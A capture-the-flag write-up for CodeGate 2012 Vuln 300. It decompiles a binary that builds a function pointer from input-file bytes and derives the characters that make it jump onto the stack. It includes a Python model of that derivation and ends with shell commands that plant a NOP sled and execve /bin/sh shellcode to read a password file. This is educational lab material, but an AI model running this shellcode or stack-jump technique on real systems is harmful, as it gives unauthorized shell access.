CodeGate 2012 Quals – Vuln 300

Here we are given ssh credentials where we need to exploit the binary.

Summary: compose file to make program jump to stack.

Let’s decompile the binary:

#include <stdio.h>
#include <string.h>

char test[0x12]; /* global buffer; its real size is not visible in the decompilation */

int func() {
    return 0;
}

int main(int argc, char *argv[]) {
    char s[12];
    memset(s, 0x90u, 0x12u);            /* 0x12 bytes written into a 12-byte buffer */
    FILE *stream = fopen(argv[1], "r");
    if (stream) {
        int nread = fread(s, 1u, 0xCu, stream);
        if (nread == 12) {
            void (*ptr)() = func;       /* 0x08048540 */
            unsigned int b4 = (s[4] | 1) ^ 0xE0;
            unsigned int b3 = (s[1] | 1) ^ 0xE0;
            b3 <<= 16;
            b4 <<= 24;
            strncpy(test, s, 0x12u);    /* ??? */
            ptr = (void (*)())(b4 | b3 | (unsigned int)ptr);
            ptr();                      /* the mangled pointer is called here */
            return 0;
        }
    }
    return 1;
}

The algorithm is simple – 12 bytes are read from the file named by argv[1], and the 2nd and 5th bytes are used to modify ptr, which is called afterwards.

The stack here is executable, so it’s straightforward: we should make ptr point into the stack, at our payload.

The stack addresses here are like 0xbfbfXXXX. So, the needed symbol is
0xBF ^ 0xE0 = '_' or
0xBF ^ 0xE1 = '^'

So, if we put twelve “_” into a file, we’ll jump to 0xbfbf8540.
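To check the derivation above without the binary, here is a small model of the pointer mangling as described in the decompilation (an added example, not code from the original post). FUNC_ADDR is the address of func() shown in the decompilation; only bytes 2 and 5 of the file are used, and because the high bytes are OR'd into the existing pointer rather than replacing it, only values that are supersets of the original 0x08 and 0x04 bits are reachable.

```python
# Added example: model of how the binary builds ptr from the 12-byte file.
FUNC_ADDR = 0x08048540  # address of func() from the decompilation


def derived_ptr(data: bytes, base: int = FUNC_ADDR) -> int:
    """Reproduce the pointer derivation from the decompiled code.

    Bytes 1 and 4 (0-based, i.e. the 2nd and 5th) are each OR'd with 1,
    XOR'd with 0xE0, and shifted into bits 16..23 and 24..31. The result is
    OR'd onto the original function pointer, not substituted for it.
    """
    if len(data) != 12:
        raise ValueError("the program only proceeds when exactly 12 bytes are read")
    b3 = ((data[1] | 1) ^ 0xE0) << 16
    b4 = ((data[4] | 1) ^ 0xE0) << 24
    return (b4 | b3 | base) & 0xFFFFFFFF


def inputs_for_high_byte(target: int) -> list:
    """Invert the per-byte transform: which input bytes map to `target`?

    Because of the `| 1`, each reachable target has exactly two preimages
    (the even and odd byte sharing the same upper seven bits), and odd
    targets after the XOR are unreachable altogether.
    """
    return [c for c in range(256) if ((c | 1) ^ 0xE0) == target]


if __name__ == "__main__":
    # Twelve '_' characters, as the writeup uses.
    print(hex(derived_ptr(b"_" * 12)))
    # Which printable bytes give 0xBF in the high positions?
    print([chr(c) for c in inputs_for_high_byte(0xBF)])
```

Running it confirms that a file of twelve “_” (or “^”) bytes yields 0xbfbf8540, and that those two characters are the only inputs producing 0xBF.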

Then we just put this stuff into a file and push a huge nopsled with shellcode:

$ mkdir /tmp/solve
$ cd /tmp/solve
$ export SC="` perl -e 'print "\x90"x100000 . "\xeb\x0d\x5f\x31\xc0\x50\x89\xe2\x52\x57\x54\xb0\x3b\xcd\x80\xe8\xee\xff\xff\xff/bin/sh";'`"
$ echo '^^^^^^^^^^^^^^^^^^^^^^^' >test
$ ~/X ./test
$ cat ~/password

The flag: key_is_The_davinci_cod3_!


  1. yegreS says:

    What tools do you use to decompile binary?

    1. hellman says:

      You can use IDA with Hex-Rays ;) And some manual fixing
